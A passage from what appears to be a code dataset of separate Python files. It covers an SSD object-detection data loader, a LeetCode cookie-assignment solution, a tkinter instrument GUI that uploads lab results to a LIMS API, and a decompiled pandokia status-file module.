y_rel + h_rel):\n xmin = (box[0] - x_rel) / w_rel\n ymin = (box[1] - y_rel) / h_rel\n xmax = (box[2] - x_rel) / w_rel\n ymax = (box[3] - y_rel) / h_rel\n xmin = max(0, xmin)\n ymin = max(0, ymin)\n xmax = min(1, xmax)\n ymax = min(1, ymax)\n box[:4] = [xmin, ymin, xmax, ymax]\n new_targets.append(box)\n new_targets = np.asarray(new_targets).reshape(-1, targets_y.shape[1])\n return img, new_targets\n \n def __getitem__(self, idx):\n ix = np.random.choice(np.arange(len(self.images)), self.batch_size) # TODO: shuffle per batch?\n inputs = []\n targets = []\n for i in ix:\n filename = self.images[i]\n img_path = os.path.join(self.path_prefix, filename)\n img = cv2.imread(img_path) # TODO: fix RGB or BGR?\n y = np.array(self.gt[filename].copy())\n if self.train and self.do_crop:\n img, y = self.random_sized_crop(img, y)\n img = cv2.resize(img, self.image_size)\n if self.train:\n shuffle(self.color_jitter)\n for jitter in self.color_jitter:\n img = jitter(img)\n if self.lighting_std:\n img = self.lighting(img)\n if self.hflip_prob > 0:\n img, y = self.horizontal_flip(img, y)\n if self.vflip_prob > 0:\n img, y = self.vertical_flip(img, y)\n if self.dir_debug is not None:\n y2 = y.copy()\n img2 = img.copy()\n for yy2 in y2:\n cv2.rectangle(img2, (int(yy2[0] * img2.shape[1]), int(yy2[1] * img2.shape[0])), (int(yy2[2] * img2.shape[1]), int(yy2[3] * img2.shape[0])), (255,0,0), 3)\n cv2.imwrite(self.dir_debug + filename, img2)\n y = self.bbox_util.assign_boxes(y)\n img = np.array(img, dtype=np.float32)\n img = preprocess_input(img)\n inputs.append(img) \n targets.append(y)\n return np.array(inputs), np.array(targets)\n \n def __len__(self):\n x = int(np.ceil(len(self.images) / float(self.batch_size)))\n return x\n\ndef _ssd_voc_iterator(data_dir, file_path, label_dir, image_size=(300,300), train=False, dir_debug=None):\n def f_iter(arch, bs):\n with open(file_path) as f:\n files = f.readlines()\n\n images_files = [f.strip('\\n\\r') + '.jpg' for f in files]\n annotations_files = [f.strip('\\n\\r') + '.xml' for f in files]\n\n gt = dict()\n classes = ['person', 'bird', 'cat', 'cow', 'dog', 'horse', 'sheep', 'aeroplane',\n 'bicycle', 'boat', 'bus', 'car', 'motorbike', 'train', 'bottle', 'chair',\n 'diningtable', 'pottedplant', 'sofa', 'tvmonitor']\n for a in annotations_files:\n xml_path = os.path.join(label_dir, a)\n tree = ElementTree.parse(xml_path)\n root_node = tree.getroot()\n img_filename = root_node.find('filename').text\n size_tree = root_node.find('size')\n width = float(size_tree.find('width').text)\n height = float(size_tree.find('height').text)\n object_tree_list = root_node.findall('object')\n objs = []\n for object_annotation in object_tree_list:\n obj = []\n class_name = object_annotation.find('name').text\n obj_bbox = object_annotation.find('bndbox')\n obj.append(round(float(obj_bbox.find('xmin').text)/width, 5))\n obj.append(round(float(obj_bbox.find('ymin').text)/height, 5))\n obj.append(round(float(obj_bbox.find('xmax').text)/width, 5))\n obj.append(round(float(obj_bbox.find('ymax').text)/height, 5))\n for c in classes:\n if c==class_name:\n obj.append(1.)\n else:\n obj.append(0.)\n objs.append(obj)\n gt[img_filename] = objs\n\n i = SSDSequence(gt,\n bs, data_dir,\n images_files, image_size=image_size,\n saturation_var=0.5,\n brightness_var=0.5,\n contrast_var=0.5,\n lighting_std=0.5,\n hflip_prob=0.5,\n vflip_prob=0.5,\n do_crop=True,\n crop_area_range=[0.75, 1.0],\n aspect_ratio_range=[3./4., 4./3.], \n train=train,\n dir_debug=dir_debug,\n num_classes=arch.num_classes)\n return i\n 
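`_ssd_voc_iterator` above turns Pascal VOC XML annotations into rows of normalized `[xmin, ymin, xmax, ymax]` plus a one-hot class vector. The parsing step in isolation, as a sketch mirroring that code:

```python
from xml.etree import ElementTree

def parse_voc_boxes(xml_path, classes):
    """Return [xmin, ymin, xmax, ymax, one-hot...] rows, normalized to [0, 1]."""
    root = ElementTree.parse(xml_path).getroot()
    size = root.find('size')
    w, h = float(size.find('width').text), float(size.find('height').text)
    rows = []
    for obj in root.findall('object'):
        name = obj.find('name').text
        bb = obj.find('bndbox')
        box = [float(bb.find(k).text) / d
               for k, d in (('xmin', w), ('ymin', h), ('xmax', w), ('ymax', h))]
        rows.append(box + [1.0 if c == name else 0.0 for c in classes])
    return rows
```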
\n return f_iter\n\ndef _ssd_iterator(data_dir, annotations, classes, image_size=(300,300), train=False, dir_debug=None):\n def f_iter(arch, bs):\n gt = dict()\n images_files = []\n for a in annotations:\n img_file, instance, cl, xmin, xmax, ymin, ymax = a.split(',')\n images_files.append(img_file)\n img = cv2.imread(os.path.join(data_dir, img_file))\n h, w, _ = img.shape\n obj = []\n obj.append(round(float(xmin)/w, 5))\n obj.append(round(float(ymin)/h, 5))\n obj.append(round(float(xmax)/w, 5))\n obj.append(round(float(ymax)/h, 5))\n for c in classes:\n if c==cl:\n obj.append(1.)\n else:\n obj.append(0.)\n if img_file in gt:\n gt[img_file].append(obj)\n else:\n gt[img_file] = [obj]\n\n i = SSDSequence(gt,\n bs, data_dir,\n images_files, image_size=image_size,\n saturation_var=0.5,\n brightness_var=0.5,\n contrast_var=0.5,\n lighting_std=0.5,\n hflip_prob=0.5,\n vflip_prob=0,\n do_crop=True,\n crop_area_range=[0.75, 1.0],\n aspect_ratio_range=[3./4., 4./3.], \n train=train,\n dir_debug=dir_debug,\n num_classes=arch.num_classes)\n return i\n \n return f_iter\n\nclass SSDData(vectorial.core.Data):\n def __init__(self, tg, vg, eg):\n super().__init__(tg, vg, eg)\n\n @classmethod\n def from_voc(cls, data_dir, train_file_path, val_file_path, label_dir, seed=None):\n tg = _ssd_voc_iterator(data_dir, train_file_path, label_dir, train=True, dir_debug=None)\n vg = _ssd_voc_iterator(data_dir, val_file_path, label_dir, train=False, dir_debug=None)\n eg = None\n return cls(tg, vg, eg)\n \n @classmethod\n def from_directory(cls, data_dir, annotations_file, classes, seed=None, dir_debug=None):\n with open(annotations_file) as f:\n annotations = f.readlines()\n\n annotations = [f.strip('\\n\\r') for f in annotations if not f.split(',')[0].lower().endswith('gif')]\n annotations = annotations[1:] # exclude header\n shuffle(annotations)\n cnt_train = int(len(annotations)*.8)\n train_annotations = annotations[:cnt_train]\n val_annotations = annotations[cnt_train:]\n\n tg = _ssd_iterator(data_dir, annotations, classes, train=True, dir_debug=dir_debug)\n vg = _ssd_iterator(data_dir, annotations, classes, train=False, dir_debug=dir_debug)\n eg = None\n return cls(tg, vg, eg)\n\nclass SSDModel(vectorial.core.Model):\n def __init__(self, name, architecture, data):\n super().__init__(name, architecture, data)\n dir_path = os.path.dirname(os.path.realpath(__file__))\n architecture._model.load_weights(os.path.join(dir_path, 'weights_SSD300.hdf5'), by_name=True)\n\n freeze = ['input_1', 'conv1_1', 'conv1_2', 'pool1',\n 'conv2_1', 'conv2_2', 'pool2', 'conv3_1',\n 'conv3_2', 'conv3_3', 'pool3']\n \n for L in architecture._model.layers:\n if L.name in freeze:\n L.trainable = False\n\n def predict_path(self, weights, img_path, classes, threshold=0.8):\n img = cv2.imread(img_path)\n return self.predict(weights, [img], classes, threshold)\n \n def predict(self, weights, images, classes, threshold=0.8):\n self._architecture._model.load_weights(weights)\n inputs = []\n for img in images:\n img = np.array(img, dtype=np.float32)\n img = cv2.resize(img, (300,300))\n inputs.append(img.copy())\n inputs = preprocess_input(np.array(inputs))\n preds = self._architecture._model.predict(inputs, batch_size=64)\n bbox_util = BBoxUtility(len(classes)+1)\n results = bbox_util.detection_out(preds)\n results_dicts = []\n for r_image in results:\n dicts = []\n for r in r_image:\n label, conf, xmin, ymin, xmax, ymax = r\n if conf>threshold:\n dicts.append({'label': label, 'conf': conf, 'xmin': xmin, 'ymin': ymin, 'xmax': xmax, 'ymax': ymax})\n 
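One thing to watch in `SSDData.from_directory` above: it computes an 80/20 split into `train_annotations` and `val_annotations` but then builds both iterators from the full `annotations` list, so train and validation would see the same samples. If that is unintended, the split pattern would look like this (sketch with stand-in data):

```python
from random import shuffle

annotations = list(range(10))          # stand-in for the parsed CSV rows
shuffle(annotations)
cnt_train = int(len(annotations) * .8)
train_annotations = annotations[:cnt_train]
val_annotations = annotations[cnt_train:]
# The iterators should then be built from the two disjoint slices:
# tg = _ssd_iterator(data_dir, train_annotations, classes, train=True, ...)
# vg = _ssd_iterator(data_dir, val_annotations, classes, train=False, ...)
```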
results_dicts.append(dicts)\n return results_dicts\n","sub_path":"vectorial/images/objectdetection/ssd/ssd.py","file_name":"ssd.py","file_ext":"py","file_size_in_byte":50450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"359845635","text":"'''\n假设你是一位很棒的家长,想要给你的孩子们一些小饼干。但是,每个孩子最多只能给一块饼干。\n对每个孩子 i,都有一个胃口值 g[i],这是能让孩子们满足胃口的饼干的最小尺寸;并且每块饼干 j,都有一个尺寸 s[j] 。如果 s[j] >= g[i],我们可以将这个饼干 j 分配给孩子 i ,这个孩子会得到满足。你的目标是尽可能满足越多数量的孩子,并输出这个最大数值。\n\n示例 1:\n输入: g = [1,2,3], s = [1,1]\n输出: 1\n解释:\n你有三个孩子和两块小饼干,3个孩子的胃口值分别是:1,2,3。\n虽然你有两块小饼干,由于他们的尺寸都是1,你只能让胃口值是1的孩子满足。\n所以你应该输出1。\n\n链接:https://leetcode-cn.com/problems/assign-cookies\n'''\nfrom typing import List\ndef findContentChildren(g: List[int], s: List[int]) -> int:\n '''\n 排序加双指针\n :param g:\n :param s:\n :return:\n '''\n g.sort()\n s.sort()\n glen,slen = len(g),len(s)\n i , j = 0,0\n while i < glen and j < slen:\n if s[j] >= g[i]:\n i+=1\n j+=1\n else:\n j+=1\n return i\n\n","sub_path":"code/34_分发饼干.py","file_name":"34_分发饼干.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"58770917","text":"import tkinter as tk\nimport tkinter.ttk as ttk\nimport os\nimport sys\nimport socket\nimport serial\nimport sqlite3\nimport platform\npy3 = True\n\nclass Toplevel1():\n\n instrumentName = \"Network_based_instrument\"\n port = 5100\n ip = 0\n \n # update counter where counter is used as the test id\n def cset(self):\n self.dbc('update counter set count = ' + str(self.cget() + 1) +\n ' where id = 1 ')\n return True\n\n # gets counter\n def cget(self):\n x = self.dbc('select count from counter where id = 1 ')[0][0]\n return x\n\n # inserts test that currespond to a given barcode to the database\n def testset(self, result):\n self.dbc('insert into test(test_id,barcodeid,results) values('\n '' + str(self.cget()) + ',\"' + result['id'] + '\",\"' + str(result['result']) + '\");')\n self.cset()\n return True\n\n # contact the LIMS api through a given url and gets the sample data\n # using barcode\n def getSampleParameters(self, sampleBarCode):\n sampleBarCode = str(sampleBarCode)\n print(self.sampleid + b'=' + sampleBarCode.encode())\n try:\n resp = requests.get(self.apigetter, params=self.sampleid + b'=' +\n sampleBarCode.encode(), timeout=2)\n if resp.status_code == 200:\n respjson = resp.json()\n print(respjson)\n if 'error' in respjson:\n return False\n required_tests = []\n for i in respjson[0]['parameters']:\n required_tests.append(i['code'])\n print(required_tests)\n return required_tests\n else:\n print('getSampleParameters: invalid resp')\n return 'nc'\n except:\n print('getsampleParameters: error in requests')\n return 'nc'\n\n # upload the state of given test to uploaded\n def testseterror(self, test):\n # print('setting uploaded')\n if self.dbc('update test set uploadstate = \"e\" where test_id = ' + str(test)):\n return True\n else:\n return False\n \n # upload the state of given test to uploaded\n def testsetuploaded(self, test):\n # print('setting uploaded')\n if self.dbc('update test set uploadstate = \"y\" where test_id = ' + str(test)):\n return True\n else:\n return False\n\n # uploads tests for the same api through different url\n def upload(self, sample):\n print('uploader')\n record = {'id': sample[1], 'instrument_code': self.instrumentName}\n print(record)\n parameters = []\n for test in sample[2]:\n parameters.append(\n {\n 'parameter': list(test.keys())[0],\n 'results': list(test.values())[0],\n 
'status': 'null',\n 'flag': 'null'\n }\n )\n record['parameters'] = parameters\n print(record)\n try:\n resp = requests.post(self.apisetter, json=record)\n if resp.status_code == 200:\n self.testsetuploaded(sample[0])\n print(resp.json())\n return 'done'\n else:\n print(resp.status_code)\n print(resp.content.decode())\n return 'connection error'\n except:\n return 'upload: connection error'\n\n # write clicked create connection\n # and gets test results where the upload state is \"n\"\n # which means not uploaded\n def attemptUpload(self):\n samples = self.dbc('select * from test where uploadstate = \"n\" order by created_at desc')\n # for i in samples:\n # print(i)\n # print('\\n')\n if len(samples)==0:\n return\n for sample in samples:\n parms = self.getSampleParameters(sample[1])\n\n # this condition check is the test code it within the parms brought from the api LIMS\n # for the given barcode\n # note that test[1] is the barcode it self\n if parms:\n # print(sample[2])\n string = sample[2][1:-1].split(',')\n # print(string)\n testlist = []\n for test in string:\n test = test.split(':')\n # print(test)\n testlist.append({test[0].strip()[1:-1]: test[1].strip()[1:-1]})\n # print(testlist)\n samplelist = []\n samplelist.append(sample[0])\n samplelist.append(sample[1])\n samplelist.append(testlist)\n # print(samplelist)\n self.upload(samplelist)\n else:\n self.testseterror(sample[0])\n\n # upload the last test result and\n # try to upload unuploaded tests\n def writer(self, result):\n print('Writer: result,', result)\n self.testset(result)\n self.attemptUpload()\n\n # craete a connection\n def dbc(self, d=''):\n # print(d)\n os.chdir(self.path + self.instrumentName)\n # print('dbc',os.getcwd())\n if d:\n with sqlite3.connect('median.db') as cnxn:\n # print('first with')\n c = cnxn.cursor()\n x = list(c.execute(d))\n c.close()\n return x\n\n\n def run(self):\n self.connect_button.configure(state='disabled')\n self.show('connecting')\n # prepare connection\n # check if the conenction valid\n # enable disconnect button\n # call the amin loop\n\n # turns off the connect button and start the run function\n # this function only works if the connection button is active\n def connect(self, p1):\n # print('starting one')\n if self.connect_button.state()[0] == 'active':\n self.show('starting')\n self.run()\n\n # show used to # print strings on the connection state scrolled text box\n def show(self, string):\n self.connection_state_text.configure(state='normal')\n self.connection_state_text.insert(tk.END, '\\n'+string)\n self.connection_state_text.configure(state='disabled')\n \n # gets the right ip\n def getIP(self):\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect(('8.8.8.8', 80))\n self.ip = s.getsockname()[0]\n s.close()\n\n # exit2 is basically a program close button it check is the exit button is working and then\n # it calls the disconnect and the root.destroy functions\n # and finally close the program with sys.close\n def exit2(self, p1):\n if self.exit_btn.state()[0] == 'active':\n self.disconnect()\n self.root.destroy()\n sys.exit()\n\n # the initialization function\n def __init__(self):\n self.root = tk.Tk()\n '''This class configures and populates the toplevel window.\n top is the toplevel containing window.'''\n _bgcolor = '#d9d9d9' # X11 color: 'gray85'\n _fgcolor = '#000000' # X11 color: 'black'\n _compcolor = '#d9d9d9' # X11 color: 'gray85'\n _ana1color = '#d9d9d9' # X11 color: 'gray85'\n _ana2color = '#ececec' # Closest X11 color: 'gray92'\n self.style = 
ttk.Style()\n if sys.platform == \"win32\":\n self.style.theme_use('winnative')\n self.style.configure('.', background=_bgcolor)\n self.style.configure('.', foreground=_fgcolor)\n self.style.configure('.', font=\"TkDefaultFont\")\n self.style.map('.', background=\n [('selected', _compcolor), ('active', _ana2color)])\n\n self.root.geometry(\"595x600+422+80\")\n self.root.title(self.instrumentName)\n self.root.configure(background=\"#d9d9d9\")\n self.root.configure(highlightbackground=\"#d9d9d9\")\n self.root.configure(highlightcolor=\"black\")\n\n self.connection_parameter_frame = ttk.Labelframe(self.root)\n self.connection_parameter_frame.place(relx=0.017, rely=0.02\n , relheight=0.274, relwidth=0.941)\n self.connection_parameter_frame.configure(relief='')\n self.connection_parameter_frame.configure(text='''connection_parameter''')\n self.connection_parameter_frame.configure(width=560)\n\n self.port_description_frame = ttk.Labelframe(self.connection_parameter_frame)\n self.port_description_frame.place(relx=0.018, rely=0.519, relheight=0.333\n , relwidth=0.714, bordermode='ignore')\n self.port_description_frame.configure(relief='')\n self.port_description_frame.configure(text='''network_parameters''')\n self.port_description_frame.configure(width=400)\n\n self.port_entry = ttk.Entry(self.port_description_frame)\n self.port_entry.place(relx=0.025, rely=0.444, relheight=0.467, relwidth=0.33, bordermode='ignore')\n self.port_entry.configure(takefocus=\"\")\n self.port_entry.configure(cursor=\"ibeam\")\n\n self.ip_entry = ttk.Entry(self.port_description_frame)\n self.ip_entry.place(relx=0.37, rely=0.444, relheight=0.467, relwidth=0.596, bordermode='ignore')\n self.ip_entry.configure(takefocus=\"\")\n self.ip_entry.configure(cursor=\"ibeam\")\n\n self.connect_button = ttk.Button(self.connection_parameter_frame)\n self.connect_button.place(relx=0.804, rely=0.34, height=25, width=76\n , bordermode='ignore')\n self.connect_button.configure(text='''connect''')\n self.connect_button.configure(command=lambda e='': self.connect(e))\n\n self.disconnect_button = ttk.Button(self.connection_parameter_frame)\n self.disconnect_button.place(relx=0.804, rely=0.54, height=25, width=76\n , bordermode='ignore')\n self.disconnect_button.configure(takefocus=\"\")\n self.disconnect_button.configure(text='''disconnect''')\n self.disconnect_button.configure(state='disable')\n self.disconnect_button.configure(command=lambda e='': self.exit1(e))\n\n self.exit_btn = ttk.Button(self.connection_parameter_frame)\n self.exit_btn.place(relx=0.804, rely=0.74, height=25, width=76\n , bordermode='ignore')\n self.exit_btn.configure(takefocus=\"\")\n self.exit_btn.configure(text='''exit''')\n self.exit_btn.configure(command=lambda e='': self.exit2(e))\n\n self.connection_state = ttk.Labelframe(self.root)\n self.connection_state.place(relx=0.017, rely=0.304, relheight=0.68\n , relwidth=0.941)\n self.connection_state.configure(relief='')\n self.connection_state.configure(text='''connection_state''')\n self.connection_state.configure(width=560)\n\n self.connection_state_text = ScrolledText(self.connection_state)\n self.connection_state_text.place(relx=0.018, rely=0.06, relheight=0.928\n , relwidth=0.966, bordermode='ignore')\n self.connection_state_text.configure(background=\"white\")\n self.connection_state_text.configure(state='disabled')\n self.connection_state_text.configure(font=\"TkTextFont\")\n self.connection_state_text.configure(foreground=\"black\")\n self.connection_state_text.configure(highlightbackground=\"#d9d9d9\")\n 
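The `dbc`/`testset`/`attemptUpload` methods above implement a small store-and-forward queue: results are written locally first with uploadstate 'n' (new), then flipped to 'y' after a successful POST or 'e' when the LIMS lookup fails, so nothing is lost while offline. The state machine in miniature (a runnable sketch; an in-memory database stands in for median.db):

```python
import sqlite3

with sqlite3.connect(':memory:') as cnxn:
    cnxn.execute("CREATE TABLE test(test_id INTEGER PRIMARY KEY, "
                 "uploadstate TEXT NOT NULL DEFAULT 'n')")
    cnxn.execute("INSERT INTO test(test_id) VALUES (1)")
    # A successful upload marks the row done; failures would set 'e' instead.
    cnxn.execute("UPDATE test SET uploadstate = 'y' WHERE test_id = 1")
    pending = cnxn.execute(
        "SELECT test_id FROM test WHERE uploadstate = 'n'").fetchall()
    print(pending)  # [] -- nothing left to retry
```

Relatedly, the CREATE TABLE try/except blocks further below match on the text of `sqlite3.OperationalError`; SQLite's `CREATE TABLE IF NOT EXISTS` achieves the same without string matching.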
self.connection_state_text.configure(highlightcolor=\"black\")\n self.connection_state_text.configure(insertbackground=\"black\")\n self.connection_state_text.configure(insertborderwidth=\"3\")\n self.connection_state_text.configure(selectbackground=\"#c4c4c4\")\n self.connection_state_text.configure(selectforeground=\"black\")\n self.connection_state_text.configure(width=254)\n self.connection_state_text.configure(wrap=\"none\")\n\n '''the following two statements used to initiate the port entry and file path entry'''\n self.getIP()\n self.ip_entry.insert(0, self.ip)\n self.port_entry.insert(0, self.port)\n self.path=str(os.path.expanduser('~/'))\n os.chdir(self.path)\n try:\n os.mkdir(self.instrumentName)\n except FileExistsError:\n pass\n os.chdir(self.path + self.instrumentName)\n print(os.getcwd())\n\n self.dbc()\n try:\n self.dbc('''\n CREATE TABLE sample(\n barcode unsigned int primary key,\n created_at datetime not null default current_timestamp\n )\n ''')\n except sqlite3.OperationalError as e:\n # print('already exists')\n if str(e)[-6:] == 'exists':\n pass\n else:\n raise sqlite3.OperationalError\n\n\n try:\n self.dbc('''\n CREATE TABLE counter(\n id unsigned int primary key not null default 1,\n count unsigned int not null default 1\n )\n ''')\n self.dbc('insert into counter(id,count) values(1,1);')\n except sqlite3.OperationalError as e:\n # print('already exists')\n if str(e)[-6:] == 'exists':\n pass\n else:\n raise sqlite3.OperationalError\n\n\n\n try:\n self.dbc('''\n CREATE TABLE test(\n test_id unsigned int primary key not null,\n barcodeid varchar(30) not null,\n results varchar(20000) not null,\n uploadstate varchar(1) default 'n',\n created_at datetime not null default current_timestamp,\n FOREIGN KEY(barcodeid) REFERENCES user(barcode)\n );\n ''')\n except sqlite3.OperationalError as e:\n # print('already exists')\n if str(e)[-6:] == 'exists':\n pass\n else:\n raise sqlite3.OperationalError\n\n\n# The following code is added to facilitate the Scrolled widgets you specified.\nclass AutoScroll(object):\n '''Configure the scrollbars for a widget.'''\n\n def __init__(self, master):\n # Rozen. Added the try-except clauses so that this class\n # could be used for scrolled entry widget for which vertical\n # scrolling is not supported. 
5/7/14.\n try:\n vsb = ttk.Scrollbar(master, orient='vertical', command=self.yview)\n except:\n pass\n hsb = ttk.Scrollbar(master, orient='horizontal', command=self.xview)\n\n #self.configure(yscrollcommand=_autoscroll(vsb),\n # xscrollcommand=_autoscroll(hsb))\n try:\n self.configure(yscrollcommand=self._autoscroll(vsb))\n except:\n pass\n self.configure(xscrollcommand=self._autoscroll(hsb))\n\n self.grid(column=0, row=0, sticky='nsew')\n try:\n vsb.grid(column=1, row=0, sticky='ns')\n except:\n pass\n hsb.grid(column=0, row=1, sticky='ew')\n\n master.grid_columnconfigure(0, weight=1)\n master.grid_rowconfigure(0, weight=1)\n\n # Copy geometry methods of master (taken from ScrolledText.py)\n if py3:\n methods = tk.Pack.__dict__.keys() | tk.Grid.__dict__.keys() \\\n | tk.Place.__dict__.keys()\n else:\n methods = tk.Pack.__dict__.keys() + tk.Grid.__dict__.keys() \\\n + tk.Place.__dict__.keys()\n\n for meth in methods:\n if meth[0] != '_' and meth not in ('config', 'configure'):\n setattr(self, meth, getattr(master, meth))\n\n @staticmethod\n def _autoscroll(sbar):\n '''Hide and show scrollbar as needed.'''\n def wrapped(first, last):\n first, last = float(first), float(last)\n if first <= 0 and last >= 1:\n sbar.grid_remove()\n else:\n sbar.grid()\n sbar.set(first, last)\n return wrapped\n\n def __str__(self):\n return str(self.master)\n\n\ndef _create_container(func):\n '''Creates a ttk Frame with a given master, and use this new frame to\n place the scrollbars and the widget.'''\n def wrapped(cls, master, **kw):\n container = ttk.Frame(master)\n container.bind('', lambda e: _bound_to_mousewheel(e, container))\n container.bind('', lambda e: _unbound_to_mousewheel(e, container))\n return func(cls, container, **kw)\n return wrapped\n\n\nclass ScrolledText(AutoScroll, tk.Text):\n '''A standard Tkinter Text widget with scrollbars that will\n automatically show/hide as needed.'''\n @_create_container\n def __init__(self, master, **kw):\n tk.Text.__init__(self, master, **kw)\n AutoScroll.__init__(self, master)\n\n\ndef _bound_to_mousewheel(event, widget):\n child = widget.winfo_children()[0]\n if platform.system() == 'Windows' or platform.system() == 'Darwin':\n child.bind_all('', lambda e: _on_mousewheel(e, child))\n child.bind_all('', lambda e: _on_shiftmouse(e, child))\n else:\n child.bind_all('', lambda e: _on_mousewheel(e, child))\n child.bind_all('', lambda e: _on_mousewheel(e, child))\n child.bind_all('', lambda e: _on_shiftmouse(e, child))\n child.bind_all('', lambda e: _on_shiftmouse(e, child))\n\n\ndef _unbound_to_mousewheel(event, widget):\n if platform.system() == 'Windows' or platform.system() == 'Darwin':\n widget.unbind_all('')\n widget.unbind_all('')\n else:\n widget.unbind_all('')\n widget.unbind_all('')\n widget.unbind_all('')\n widget.unbind_all('')\n\n\ndef _on_mousewheel(event, widget):\n if platform.system() == 'Windows':\n widget.yview_scroll(-1*int(event.delta/120),'units')\n elif platform.system() == 'Darwin':\n widget.yview_scroll(-1*int(event.delta),'units')\n else:\n if event.num == 4:\n widget.yview_scroll(-1, 'units')\n elif event.num == 5:\n widget.yview_scroll(1, 'units')\n\n\ndef _on_shiftmouse(event, widget):\n if platform.system() == 'Windows':\n widget.xview_scroll(-1*int(event.delta/120), 'units')\n elif platform.system() == 'Darwin':\n widget.xview_scroll(-1*int(event.delta), 'units')\n else:\n if event.num == 4:\n widget.xview_scroll(-1, 'units')\n elif event.num == 5:\n widget.xview_scroll(1, 'units')\n\n#\ninstance = 
Toplevel1()\ninstance.root.mainloop()\n\n","sub_path":"Layouts/Network/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":18729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"175246627","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/jhunk/Downloads/pandokia/pandokia/run_status.py\n# Compiled at: 2018-05-14 14:25:23\n# Size of source mod 2**32: 12650 bytes\nimport ast, datetime, mmap, os, platform, sys, time\nmem = None\ntest_mode = None\nif test_mode:\n saw_locked = 0\n saw_changed = 0\nif platform.system() == 'Windows':\n\n def init_status(*l, **kw):\n pass\n\n\n def pdkrun_status(*l, **kw):\n pass\n\n\n def display(*l, **kw):\n pass\n\n\n def display_interactive(*l, **kw):\n pass\n\n\nelse:\n\n def init_status(filename=None, n_records=10, status_text_size=2000):\n \"\"\"Create a status file with n_records blank records in it\n \"\"\"\n valid_flag_size = 1\n if filename is None:\n filename = os.getcwd() + '/pdk_statusfile'\n try:\n os.unlink(filename)\n except:\n pass\n\n with open(filename, 'w') as (fp):\n\n def gen_header():\n s = '********PDKRUN status monitor 000\\n%08d %d %d %d\\n' % (\n header_size, status_text_size, n_records, valid_flag_size)\n return s\n\n header_size = 0\n header = gen_header()\n header_size = len(header)\n header = gen_header()\n assert header_size == len(header)\n fp.write(('%08x' % int(time.time()))[0:8])\n fp.write(header[8:])\n for x in range(n_records):\n fp.write(' ' * (valid_flag_size + status_text_size))\n fp.write('\\n')\n\n return filename\n\n\n class status_block(object):\n\n def __init__(self, filename, mode):\n if mode == 'w':\n mode = 'r+b'\n prot = mmap.PROT_READ | mmap.PROT_WRITE\n else:\n mode = 'rb'\n prot = mmap.PROT_READ\n with open(filename, mode) as (fp):\n for lineno, record in enumerate(fp):\n record = record.decode()\n if lineno == 0:\n if record[8:] != 'PDKRUN status monitor 000\\n':\n raise Exception('Not a PDKRUN status monitor file: %s' % filename)\n else:\n if lineno == 1:\n header = record.strip().split(' ')\n\n self._fd = os.dup(fp.fileno())\n self.header_size = int(header[0])\n self.status_text_size = int(header[1])\n self.n_records = int(header[2])\n self.valid_flag_size = int(header[3])\n self.record_size = self.valid_flag_size + self.status_text_size + 1\n self.status_text_offset = self.valid_flag_size\n self.locked_valid_flag = 'X' * self.valid_flag_size\n self.file_size = self.record_size * self.n_records + self.header_size\n self.mem = mmap.mmap(fileno=(self._fd),\n length=(self.file_size),\n flags=(mmap.MAP_SHARED),\n prot=prot)\n self.header_timestamp = self.mem[0:8]\n\n def header_changed(self):\n return self.mem[0:8] != self.header_timestamp\n\n def get_status_text(self, n):\n return self.get_value_at_offset(n, self.status_text_offset, self.status_text_size)\n\n def get_value_at_offset(self, n, offset, len):\n global saw_changed\n global saw_locked\n start = self.header_size + n * self.record_size\n flag = self.mem[start:start + self.valid_flag_size]\n if flag == self.locked_valid_flag:\n if test_mode:\n if test_mode == 'L':\n saw_locked += 1\n return 'locked'\n return\n else:\n s = self.mem[start + offset:start + offset + len]\n if flag != self.mem[start:start + self.valid_flag_size]:\n if test_mode and test_mode == 'C':\n saw_changed += 1\n return 'changed'\n else:\n return\n return s\n\n def 
set_my_record(self, n):\n if n >= self.n_records:\n raise Exception('only %d records in file - using #%d\\n' % (\n self.n_records, n))\n self.my_record = n\n self.my_record_offset = self.header_size + n * self.record_size\n\n def set_status_text(self, value):\n return self.set_value_at_offset(self.status_text_offset, self.status_text_size, value)\n\n def set_value_at_offset(self, offset, blocklen, value):\n start = self.my_record_offset\n old_valid_flag = self.mem[start:start + self.valid_flag_size]\n try:\n self.mem[start:start + self.valid_flag_size] = self.locked_valid_flag\n except TypeError:\n self.mem[start:start + self.valid_flag_size] = bytes(self.locked_valid_flag, 'ascii')\n\n if len(value) < blocklen:\n value = value + ' ' * (blocklen - len(value) + 1)\n value = value[0:blocklen]\n try:\n s = self.mem[start + offset:start + offset + blocklen] = value\n except TypeError:\n s = self.mem[start + offset:start + offset + blocklen] = bytes(value, 'ascii')\n\n try:\n n = int(old_valid_flag) + 1 & 7\n except:\n n = 0\n\n try:\n self.mem[start:start + self.valid_flag_size] = '%*d' % (self.valid_flag_size, n)\n except TypeError:\n self.mem[start:start + self.valid_flag_size] = bytes('%*d' % (\n self.valid_flag_size,\n n), 'ascii')\n\n\n if __name__ == '__main__':\n s = sys.stdin.readline().strip()\n if s == 'i':\n init_status('pdk_statusfile', 10)\n s = 'w'\n if s == 's':\n m = status_block('pdk_statusfile')\n m.set_my_record(1)\n for x in range(0, 10000000):\n m.set_status_text('%d' % x)\n\n else:\n m = status_block('pdk_statusfile')\n m.set_my_record(int(s))\n while 1:\n print('>')\n l = sys.stdin.readline().strip()\n if l[0] in '0123456789':\n n = int(l.split()[0])\n m.set_my_record(n)\n else:\n if l[0] == 's':\n m.set_status_text(l[1:])\n else:\n print('?')\n\n def pdkrun_status(text, slot=None):\n \"\"\"A status setting function for use within pdkrun\n\n You call pdkrun_status( text ) to set your status\n\n slot is the slot number to note the status in (default is PDK_PROCESS_SLOT environment)\n \"\"\"\n global mem\n if 'PDK_STATUSFILE' not in os.environ:\n return\n else:\n if os.environ['PDK_STATUSFILE'] == 'none':\n return\n if slot is None:\n if 'PDK_PROCESS_SLOT' in os.environ:\n slot = int(os.environ['PDK_PROCESS_SLOT'])\n else:\n slot = 0\n if mem is None:\n mem = 